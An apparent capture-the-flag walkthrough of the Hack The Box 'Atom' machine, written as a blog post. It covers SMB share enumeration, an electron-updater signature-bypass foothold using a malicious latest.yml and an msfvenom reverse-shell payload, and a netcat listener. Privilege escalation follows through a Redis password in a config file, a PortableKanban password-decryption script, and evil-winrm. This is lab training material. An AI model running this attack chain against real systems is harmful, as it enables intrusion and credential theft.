Initial_Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -sV -sT -p- --min-rate 5000 10.129.230.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 16:58 EDT
Nmap scan report for 10.129.230.162
Host is up (0.036s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open redis Redis key-value store
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService_Recon
Initially, we can look at the website to see if we could find anything interesting.
After looking through the website, we didn't find much that was interesting. The website talked about the Heed application, which is a note-taking application. The website stated that they had macOS and Linux versions of the application coming soon. There looked to be only a Windows version at the time. Hovering over the link to the Window's install file, we can see the file is being hosted in the Releases directory of the website.
Since we didn't find much here, we will do some recon on the SMB service. We can run the SMB nmap nse scripts on the host
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
nmap --script "smb-enum-*" -p 445 10.129.230.162
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-17 17:32 EDT
Nmap scan report for atom (10.129.230.162)
Host is up (0.035s latency).PORT STATE SERVICE
445/tcp open microsoft-dsHost script results:
| smb-enum-shares:
| account_used: guest
| \\10.129.230.162\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.230.162\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.230.162\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
| Current user access: READ/WRITE
| \\10.129.230.162\Software_Updates:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ/WRITENmap done: 1 IP address (1 host up) scanned in 40.34 secondsSet sail on the cyber waves with Nmap, the ultimate navigator for the digital depths. This powerful tool scans the network seas, charting out ports and services like a seasoned captain scanning the horizon. With Nmap at the helm, you can uncover hidden services, stormy vulnerabilities, and safe harbors. It’s an essential part of any cyber sailor’s toolkit, perfect for those ready to discover what secrets lie beneath the network's surface and plot a course through the treacherous waters of cybersecurity.
Imagine SMB as the grand conductor orchestrating the symphony of network file and printer sharing. In the vast arena of Windows domains, SMB directs the seamless exchange of digital assets like a maestro leading a complex musical score. It’s not just about transferring files; it’s about maintaining the rhythm of productivity and harmony within the digital ecosystem. With each request and response, SMB ensures that every node in the network performs in perfect unison, safeguarding the integrity and accessibility of shared resources.
or we can run a Null scan with smbmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
smbmap -H 10.129.230.162 -u test -p test
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.230.162:445 Name: atom Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Software_Updates READ, WRITE Imagine smbmap as your high-tech spyglass, scanning the horizon of SMB (Server Message Block) shares across network seas. This clever tool dives into network nooks, revealing which doors are open, which are locked, and what treasures they might hide inside. It's perfect for digital explorers and cybersecurity crusaders seeking to map out their next adventure in the vast landscape of network shares, providing crucial intel on where vulnerabilities might lie and where the loot is stashed!
We then then look at the content of the Software_Updates folder on the SMB share
1
2
3
4
5
6
7
8
9
smbclient --no-pass //10.129.230.162/Software_Updates
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 17 17:36:55 2024
.. D 0 Fri May 17 17:36:55 2024
client1 D 0 Fri May 17 17:36:55 2024
client2 D 0 Fri May 17 17:36:55 2024
client3 D 0 Fri May 17 17:36:55 2024
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 07:18:08 2021Envision smbclient as the nimble navigator of the SMB landscape, a command-line tool that stealthily traverses network shares. Like a digital locksmith, it unlocks the secrets of server message blocks, allowing users to explore, transfer files, and communicate across networks with precision. It's the essential toolkit for any cyber explorer eager to decode the mysteries of network shares efficiently.
Download and read UAT_Testing_Procedures.pdf
1
2
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (185.8 KiloBytes/sec) (average 185.8 KiloBytes/sec)The document states the application is built with electron-builder and how new builds of the application are kicked off. The QA process starts when a new update is placed in one of the client folders.
Foothold
To get our foothold onto the system, we want to look at how we can upload a payload that will be executed on the system. We first want to download the Windows install and extract the content of the zip file. Extracting the content of the zip file created a folder that has an uninstall file and a folder called '$PLUGINSDIR'
1
2
3
4
drwxr-xr-x 3 shabbadoo shabbadoo 4096 May 20 13:41 .
drwxr-xr-x 4 shabbadoo shabbadoo 4096 May 20 13:41 ..
drwxr-xr-x 2 shabbadoo shabbadoo 4096 May 20 13:41 '$PLUGINSDIR'
-rw-r--r-- 1 shabbadoo shabbadoo 135832 Apr 9 2021 'Uninstall heedv1.exe'Once we cd into the '$PLUGINSDIR' directory, we see a few dll files and another archived file called app-64.7z.
1
2
3
4
5
6
7
-rw-r--r-- 1 shabbadoo shabbadoo 46103281 Apr 9 2021 app-64.7z
-rw-r--r-- 1 shabbadoo shabbadoo 400384 Apr 9 2021 nsis7z.dll
-rw-r--r-- 1 shabbadoo shabbadoo 4608 Apr 9 2021 nsProcess.dll
-rw-r--r-- 1 shabbadoo shabbadoo 9216 Apr 9 2021 SpiderBanner.dll
-rw-r--r-- 1 shabbadoo shabbadoo 103424 Apr 9 2021 StdUtils.dll
-rw-r--r-- 1 shabbadoo shabbadoo 11776 Apr 9 2021 System.dll
-rw-r--r-- 1 shabbadoo shabbadoo 3072 Apr 9 2021 WinShell.dll We unzip the app-64.7z file and then cd into the resources folder to see files called app-update.yml and app.asar that look interesting.
1
2
3
4
5
6
7
8
9
┌──(shabbadoo㉿kali)-[~/…/heed/$PLUGINSDIR/app-64/resources]
└─$ ls -l
total 3356
-rw-r--r-- 1 shabbadoo shabbadoo 2994272 May 20 13:44 app.asar
-rw-r--r-- 1 shabbadoo shabbadoo 79 May 20 13:44 app-update.yml
-rw-r--r-- 1 shabbadoo shabbadoo 296356 May 20 13:44 electron.asar
-rw-r--r-- 1 shabbadoo shabbadoo 114416 May 20 13:44 elevate.exe
drwxr-xr-x 69 shabbadoo shabbadoo 4096 May 20 13:44 inspector
drwxr-xr-x 16 shabbadoo shabbadoo 4096 May 20 14:03 node_modulesThe content of the app-update.yml file shows us where updates are pulled from
1
2
3
4
5
6
┌──(shabbadoo㉿kali)-[~/…/heed/$PLUGINSDIR/app-64/resources]
└─$ cat app-update.yml
provider: generic
url: 'http://updates.atom.htb'
publisherName:
- HackTheBoxThe app.asar file is another archive format and can be extracted with the following command.
1
npx asar extract app.asar dest-dirOnce we cd to the dest-dir directory and view the content. We see the package.json file
1
2
3
4
5
6
7
8
9
10
11
┌──(shabbadoo㉿kali)-[~/…/$PLUGINSDIR/app-64/resources/dest-dir]
└─$ ls -la
total 32
drwxr-xr-x 4 shabbadoo shabbadoo 4096 May 20 14:09 .
drwxr-xr-x 5 shabbadoo shabbadoo 4096 May 20 14:09 ..
-rw-r--r-- 1 shabbadoo shabbadoo 1135 May 20 14:09 createNote.html
drwxr-xr-x 2 shabbadoo shabbadoo 4096 May 20 14:09 icons
-rw-r--r-- 1 shabbadoo shabbadoo 2574 May 20 14:09 main.js
drwxr-xr-x 26 shabbadoo shabbadoo 4096 May 20 14:09 node_modules
-rw-r--r-- 1 shabbadoo shabbadoo 267 May 20 14:09 package.json
-rw-r--r-- 1 shabbadoo shabbadoo 1660 May 20 14:09 version.htmlEnvision package.json as the ultimate playlist curator for your coding jam session. This crucial file lines up your project’s dependencies like tracks in a DJ’s set, ensuring everything flows seamlessly from one beat to the next. Scripts, dependencies, and project details are mixed flawlessly under its guidance—ready for a flawless performance.
Viewing the content of the package.json file, we can see what version of the election-updater the application is running. The application is running version 2.23.3 (released over 6 years ago), and the most current stable version at the time of this post is 6.2.1.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(shabbadoo㉿kali)-[~/…/$PLUGINSDIR/app-64/resources/dest-dir]
└─$ cat package.json
{
"name": "heedv1",
"version": "1.0.0",
"main": "main.js",
"description": "Open Source Application provided by HackTheBox",
"author": "MrR3boot",
"dependencies": {
"electron-log": "^1.3.0",
"electron-updater": "^2.23.3",
"url": "^0.11.0"
}
}Imagine Electron as your tech-savvy sidekick, wielding the power of JavaScript, HTML, and CSS to conquer the desktop app world. With Chromium and Node.js in its utility belt, Electron lets you build sleek, cross-platform applications that fly high on Windows, macOS, and Linux—no cape or native development skills needed! Maintain one JavaScript codebase and watch as your superhero apps save the day on any platform. Ready to assemble your league of extraordinary applications?
Spin the latest hits in election data with the election-updater. This nifty tool keeps the beats fresh, ensuring you're always grooving to the most current version of the application.
After researching online, we found an article about a vulnerability in the electron updater. In summary, an attacker can bypass the entire signature verification by triggering a parse error in the script. This can be achieved by using a filename containing a single quote and then recalculating the file hash to match our malicious binary file.
To exploit this on this application, we can place the update file in any of the client folders, and the automated script will check for the update.
We first need to create a payload with msfvenom, which gives us a reverse shell.
1
2
3
4
5
6
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > "a'tom.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytesIn the armory of cybersecurity tools, Msfvenom stands out as the master blacksmith, forging precise digital weapons tailored for every battle in the virtual world. This tool allows you to craft custom exploits and payloads, transforming raw code into powerful tools of entry and exploration. Whether sculpting a sneaky backdoor or assembling a devastating shell, Msfvenom equips cyber adventurers with the weaponry needed to navigate and conquer the challenging landscapes of network fortresses.
Calculate our sha512 checksum and convert it to a base64 encoded format.
1
2
shasum -a 512 "a'tom.exe" | cut -d " " -f1 | xxd -r -p | base64
Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==We now create our latest.yml file that will call our malicious reverse shell.
1
2
3
version: 1.2.3
path: http://10.10.14.3/a'tom.exe
sha512: Qdk9GLbxYATk99IYFpMGOgKzb/0dCfcQqRNi+2pnp3yNjX2uZtLdr7rcqkSzwh5b9H64iWo5V4pM01Z5OTtNPA==Set up a Python Simple HTTP Server to host our payload
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host.
1
2
sudo nc -lvnp 4444
listening on [any] 4444 ...Imagine Netcat as the master communicator in the digital realm, a streamlined tool that speaks the language of TCP and UDP with unrivaled fluency. This command-line wizard casts spells to open ports, forge connections, and transfer data across the cyber seas, making it indispensable for any tech sorcerer seeking to conjure robust network interactions. Whether it’s whispering secrets through a backdoor or shouting commands across servers, Netcat commands the network elements with the ease of a seasoned conjurer.
Uploading the latest.yml file to one of the client folders in the Software_Updates SMB share
1
2
3
4
5
smbclient --no-pass //10.10.10.237/Software_Updates
Try "help" to get a list of possible commands.
smb: \> cd client1
smb: \client1\> put latest.yml
putting file latest.yml as \client1\latest.yml (1.5 kb/s) (average 1.5 kb/s)After a minute, the shell was downloaded and executed, granting a shell as the jason user.
1
2
3
4
5
sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [20/May/2024 21:55:14] code 404, message File not found
10.10.10.237 - - [20/May/2024 21:55:14] "GET /a'tom.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [20/May/2024 21:55:14] "GET /a%27tom.exe HTTP/1.1" 200 -1
2
3
4
5
6
7
8
sudo nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.237] 63920
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jasonPrivesc
If we navigate to the Redis Program folder, we see a config file called redis.windows-service.conf.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Program Files\Redis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Program Files\Redis
05/20/2024 06:31 PM <DIR> .
05/20/2024 06:31 PM <DIR> ..
07/01/2016 03:54 PM 1,024 EventLog.dll
04/02/2021 07:31 AM <DIR> Logs
07/01/2016 03:52 PM 12,618 Redis on Windows Release Notes.docx
07/01/2016 03:52 PM 16,769 Redis on Windows.docx
07/01/2016 03:55 PM 406,016 redis-benchmark.exe
07/01/2016 03:55 PM 4,370,432 redis-benchmark.pdb
07/01/2016 03:55 PM 257,024 redis-check-aof.exe
07/01/2016 03:55 PM 3,518,464 redis-check-aof.pdb
07/01/2016 03:55 PM 268,288 redis-check-dump.exe
07/01/2016 03:55 PM 3,485,696 redis-check-dump.pdb
07/01/2016 03:55 PM 482,304 redis-cli.exe
07/01/2016 03:55 PM 4,517,888 redis-cli.pdb
07/01/2016 03:55 PM 1,553,408 redis-server.exe
07/01/2016 03:55 PM 6,909,952 redis-server.pdb
04/02/2021 07:39 AM 43,962 redis.windows-service.conf
04/02/2021 07:37 AM 43,960 redis.windows.conf
07/01/2016 09:17 AM 14,265 Windows Service Documentation.docx
16 File(s) 25,902,070 bytes
3 Dir(s) 5,598,461,952 bytes freeThe Redis password is found at the top of the redis.windows-service.conf file.
1
2
3
4
C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscatBlast off at the speed of light with Redis, the in-memory data store that zips through data like a superhero. Perfect for applications that need speed and efficiency, Redis offers lightning-fast performance for caching and real-time operations. It's like having a hyperdrive for your data!
Now that we have the Redis password, we can authenticate to the Redis service and look at the stored keys. We found a key (pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0) that had a encrypted Administator password Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi.
1
2
3
4
5
6
7
8
9
10
redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
atom.htb:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
3) "pk:ids:User"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
atom.htb:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
atom.htb:6379>If we download the User_Guide.pdf file from jason's Download folder and read the content. We find that the portable-kanban stores all the settings and encrypted passwords. And since a lot of administrators reuse passwords, we are going to see if the portable-kanban and the local administrator passwords are the same.
Embark on a voyage through the bustling waters of project management with Portable-Kanban, your digital navigator. This lightweight yet powerful tool organizes tasks and workflows as if charting a course across the high seas, ensuring every member of your crew knows their duties and deadlines. With its intuitive design and encrypted password feature, Portable-Kanban keeps your project treasures mapped and secure, ready for the team to sail smoothly towards successful shores.
So we can search on Google and see if there are any exploits for portable-kanban. We find that there is exploit code published on Exploit-DB, and a couple of folks have created Python scripts to decode portable-kanban passwords
1
2
3
4
5
6
7
8
9
10
#!/usr/bin/python3
import base64
from des import * #python3 -m pip install des
import sys
# Encrypted Password to decrypt
pk_hash= "Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"
hash1 = base64.b64decode(pk_hash.encode('utf-8'))
key = DesKey(b"7ly6UznJ")
x=key.decrypt(hash1,initial=b"XuVUm5fR",padding=True).decode('utf-8')
print(x)Link to exploit: https://www.exploit-db.com/exploits/49409
and after running the decrypt script, we now have the administrator password
1
kidvscat_admin_@123After we obtain the password, we can log into the server with evil-winrm via the Windows Remote Management (WinRM) service.
1
2
3
4
5
evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
Evil-WinRM is the go-to gadget for cybersecurity professionals looking to exert control over remote Windows servers. By establishing a session through Windows Remote Management, this powerful tool allows you to execute commands as if you were sitting right at the server. It’s like having admin superpowers, enabling you to navigate, manipulate, and secure Windows environments efficiently—a must-have for any security toolkit aiming to streamline system management and penetration testing.
Similar Blog Post
